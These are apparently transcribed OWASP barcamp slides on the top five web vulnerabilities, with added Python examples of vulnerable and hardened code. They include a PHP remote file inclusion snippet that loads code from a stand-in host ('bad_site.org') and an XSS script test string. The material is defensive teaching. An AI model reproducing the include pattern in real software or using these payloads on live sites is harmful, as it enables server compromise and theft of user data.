OWASP Hacker Secrets Barcamp

DESCRIPTION

Introduction to OWASP, the OWASP Top 5, network security vs application security, and demos with WebGoat.

Hacker’s Secrets

Sharmishtha Gupta
sharmishtha.gupta@gmail.com

Agenda

• What is OWASP?
• Web security vs Network security
• OWASP Top 5
  ◦ XSS
  ◦ SQL Injection
  ◦ Malicious File Execution
  ◦ Insecure Direct Object Reference
  ◦ Cross Site Request Forgery (CSRF)

What is OWASP? | Web security vs Network security | OWASP Top 5

Open Web Application Security Project

Mission: An open community focused on web application security


Global Community

Local Bangalore Chapter: http://www.owasp.org/index.php/Bangalore

Open source projects and tools to improve web application security

Open learning resources and forum on web security


[Diagram: Attacker → Web Server]

Network Security

• The challenge is to restrict access to the network and to network resources (servers)
• To protect data exchanged over the network from eavesdroppers
• Mostly handled at the network layer (packet filtering, firewalls, etc.)


[Diagram: Compromised Web Server → Victim]

Web Security

• The server is already reachable from the network on port 80 (or whichever port the web server listens on), so the perimeter does not help here

• The challenge is to protect the other resources that are not meant to be exposed, e.g. information stored in the database and other backend systems


Top 5 webapp vulnerabilities
◦ XSS
◦ SQL Injection
◦ Malicious File Execution
◦ Insecure Direct Object Reference
◦ Cross Site Request Forgery (CSRF)

XSS | SQL Injection | Malicious File Execution | Insecure Direct Object Reference | Cross Site Request Forgery (CSRF)

Occurs when user-provided data is used in a page without validation and/or output encoding.

An attacker can execute a script in the victim’s browser and hijack important user information without her knowing.

Ex: Alice sends a scrap to Bob on Orkut with a scriptlet. When Bob opens his scrapbook, the scriptlet sends spam scraps, posing as Bob, to everyone in his network.
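As an added example (not from the original slides), the scrap-rendering step in Python: the vulnerable version pastes the author name and scrap text straight into the HTML, the hardened version validates the author name against a tight character set and entity-encodes both values for the HTML body context. The function names, the username policy and the sample scrap are constructed for this illustration.

```python
import html
import re

# Constructed sample input standing in for a "scrap" with an embedded scriptlet.
SAMPLE_SCRAP = '<script>alert("xss")</script>'

# Validation: a constructed policy allowing only a tight character set for usernames.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def is_valid_username(name):
    return USERNAME_RE.fullmatch(name) is not None


def render_scrap_unsafe(author, text):
    """Vulnerable pattern: user-provided data is pasted straight into the HTML."""
    return f'<div class="scrap"><b>{author}</b>: {text}</div>'


def render_scrap_safe(author, text):
    """Hardened pattern: reject an author name that fails validation, then
    entity-encode every user-controlled value for the HTML body context."""
    if not is_valid_username(author):
        raise ValueError("invalid author name")
    return (f'<div class="scrap"><b>{html.escape(author, quote=True)}</b>: '
            f'{html.escape(text, quote=True)}</div>')


def contains_raw_tag(rendered):
    """Check used when reviewing output: does a raw <script tag survive rendering?"""
    return "<script" in rendered.lower()
```

Encoding is context-specific: html.escape is right for element content and quoted attribute values, but data placed into a URL, a JavaScript string or a CSS value needs the encoder for that context instead.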


A real example is the “Samy worm” on MySpace.com, discovered in October 2005: http://namb.la/popular/tech.html

Demo


Occurs when user-provided data is sent to an interpreter (here, SQL) as part of a command or query.

An attacker can trick the interpreter into executing unintended commands or changing data.

Demo


Occurs when user-provided input is used to execute remote code or to load local files.

Allows attackers to include hostile code and data; it can totally compromise the server.


The most common sources of code injection are:
◦ Dynamic paths/files used in require/include statements
◦ eval(): a major source of code injection is the improper validation of user-provided input passed to eval().


<?php
// Dynamic path: the include location is taken straight from the request.
// The assignment below simulates an attacker-supplied value for the demo.
$_GET['path'] = 'http://bad_site.org';
include "{$_GET['path']}/header.inc";
?>
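The fix for both the dynamic include above and the eval() case on the previous slide is the same idea: never let the request choose a path or code; let it choose only a key in a server-side allowlist. The following Python module is an added example (not from the slides, and not PHP) of that pattern. The include directory, the two fragment files and the allowlist entries are constructed fixtures, and the function names are assumptions made for the illustration.

```python
import os
import tempfile

# Constructed fixture: a directory holding the only fragments the page may include.
INCLUDE_ROOT = os.path.realpath(tempfile.mkdtemp(prefix="includes_"))
for _name in ("header.inc", "footer.inc"):
    with open(os.path.join(INCLUDE_ROOT, _name), "w") as _fh:
        _fh.write(f"<!-- {_name} -->\n")

# Allowlist: the key is what the client may send, the value is the file opened.
# A URL, a '..' segment or a bare filename is simply not a key, so it never
# reaches the filesystem or a URL-fetching include.
ALLOWED_INCLUDES = {
    "default": "header.inc",
    "footer": "footer.inc",
}


class IncludeError(ValueError):
    """Raised for any selector that is not in the allowlist."""


def resolve_include(requested):
    """Map a client-supplied selector to an on-disk path, or raise IncludeError."""
    if requested not in ALLOWED_INCLUDES:
        raise IncludeError(f"include not permitted: {requested!r}")
    path = os.path.realpath(os.path.join(INCLUDE_ROOT, ALLOWED_INCLUDES[requested]))
    # Defence in depth: even a mistaken allowlist entry cannot escape the root.
    if os.path.commonpath([path, INCLUDE_ROOT]) != INCLUDE_ROOT:
        raise IncludeError("resolved path escapes include root")
    return path


def load_include(requested):
    """Read the selected fragment; the caller decides how to report IncludeError."""
    with open(resolve_include(requested)) as fh:
        return fh.read()


def is_include_allowed(requested):
    """True if the selector would be served, False if it would be rejected."""
    try:
        resolve_include(requested)
        return True
    except IncludeError:
        return False
```

The realpath/commonpath check is the second line of defence the slide's "dynamic path" example lacks: with the allowlist alone the code is already safe, but the containment check means a future edit that puts user data into the mapping still cannot load a file from outside the include root.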


Occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record or key, as a URL or form parameter.

Attackers can manipulate those references to access other objects without authorization.


Poor error handling is the main cause.

Demos
◦ Bad file inclusion
◦ SQL connect failure
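Added example (not part of the original slides) covering the two preceding slides together: an invoice lookup where the vulnerable version fetches whatever id appears in the request, the hardened version makes ownership part of the query, an indirect-reference map replaces database keys with random per-session handles, and the request handler returns only a generic status while the details of any database failure go to the log. The table, the two users and all function names are constructed assumptions for this illustration.

```python
import logging
import secrets
import sqlite3

log = logging.getLogger("invoices")


class NotFound(Exception):
    """Raised for both 'no such record' and 'not yours': the client cannot tell them apart."""


def make_db():
    """Constructed fixture: two invoices owned by two different users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE invoices (id INTEGER PRIMARY KEY, owner TEXT, amount INTEGER)")
    conn.executemany("INSERT INTO invoices VALUES (?, ?, ?)",
                     [(100, "alice", 50), (101, "bob", 75)])
    conn.commit()
    return conn


def get_invoice_vulnerable(conn, invoice_id):
    # Vulnerable: whatever id the client puts in the URL is fetched; the owner is ignored.
    row = conn.execute("SELECT id, owner, amount FROM invoices WHERE id = ?",
                       (invoice_id,)).fetchone()
    if row is None:
        raise NotFound
    return row


def get_invoice_safe(conn, current_user, invoice_id):
    # Hardened: the authorization decision is part of the query itself.
    row = conn.execute("SELECT id, owner, amount FROM invoices WHERE id = ? AND owner = ?",
                       (invoice_id, current_user)).fetchone()
    if row is None:
        raise NotFound
    return row


class ReferenceMap:
    """Indirect object references: the client sees random per-session handles,
    never the database key, so there is nothing to increment or guess."""

    def __init__(self):
        self._by_handle = {}

    def handle_for(self, real_id):
        handle = secrets.token_urlsafe(12)
        self._by_handle[handle] = real_id
        return handle

    def real_id(self, handle):
        if handle not in self._by_handle:
            raise NotFound
        return self._by_handle[handle]


def handle_request(conn, current_user, invoice_id):
    """Error handling that never leaks: details go to the log, the client gets a generic status."""
    try:
        _, _, amount = get_invoice_safe(conn, current_user, invoice_id)
        return {"status": 200, "amount": amount}
    except NotFound:
        return {"status": 404, "error": "not found"}
    except sqlite3.Error:
        log.exception("database failure serving invoice %r for %r", invoice_id, current_user)
        return {"status": 500, "error": "internal error"}
```

Two design points are worth noting. Returning 404 for a record that exists but belongs to someone else avoids confirming which ids are valid, and catching the driver's base exception class means a connection failure (the slide's "SQL connect failure" demo) produces the same opaque response as any other fault, with the stack trace available only to whoever reads the server log.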


An attack that forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application

This can be as powerful as the web application that it attacks


Mostly occurs when the source of the request is not validated.

Gmail change-password CSRF vulnerability disclosed by Vicente on 3rd Mar 2009
◦ http://seclists.org/fulldisclosure/2009/Mar/0029.html

Demo
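Added example (not from the original slides) of a change-password handler with and without source validation, in Python: the hardened version requires the browser-supplied Origin (or Referer) header to match the site's own origin and requires a per-session synchronizer token that only a page the server itself rendered could carry. SITE_ORIGIN, the in-module token store and the function names are constructed assumptions for this illustration.

```python
import hmac
import secrets
from urllib.parse import urlparse

SITE_ORIGIN = "https://app.example.invalid"   # assumption: the application's own origin

# Per-session synchronizer tokens. In a real application this lives with the
# session record; a module-level dict is used here only to keep the example self-contained.
_SESSION_TOKENS = {}


def issue_csrf_token(session_id):
    """Called when the form is rendered; the token goes into a hidden field."""
    token = secrets.token_urlsafe(32)
    _SESSION_TOKENS[session_id] = token
    return token


def request_is_same_origin(headers):
    """The browser-supplied Origin (or, failing that, Referer) must be our own site.
    A request with neither header is treated as cross-site."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == SITE_ORIGIN


def change_password_vulnerable(session_id, form):
    # Vulnerable: the session cookie is the only thing authorising the change, and
    # the browser attaches that cookie to the request no matter which page sent it.
    return {"status": 200, "changed_for": session_id}


def change_password_safe(session_id, form, headers):
    # Hardened: (1) the request must originate from our own site, and (2) it must
    # carry the token that only a page we served to this session could know.
    if not request_is_same_origin(headers):
        return {"status": 403, "error": "cross-site request rejected"}
    expected = _SESSION_TOKENS.get(session_id)
    supplied = str(form.get("csrf_token", ""))
    if expected is None or not hmac.compare_digest(supplied.encode(), expected.encode()):
        return {"status": 403, "error": "missing or invalid CSRF token"}
    return {"status": 200, "changed_for": session_id}
```

The two checks cover different failure modes: the token defeats a forged form even if a header is stripped by a proxy, and the origin check catches a request that somehow carries a token but was not initiated by the site's own pages. The constant-time comparison avoids leaking the token one byte at a time through response timing.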

Visit WebGoat from OWASP

◦ Good for learning vulnerabilities by solving the puzzles
◦ Good hints and solutions
◦ Download from http://code.google.com/p/webgoat/downloads/list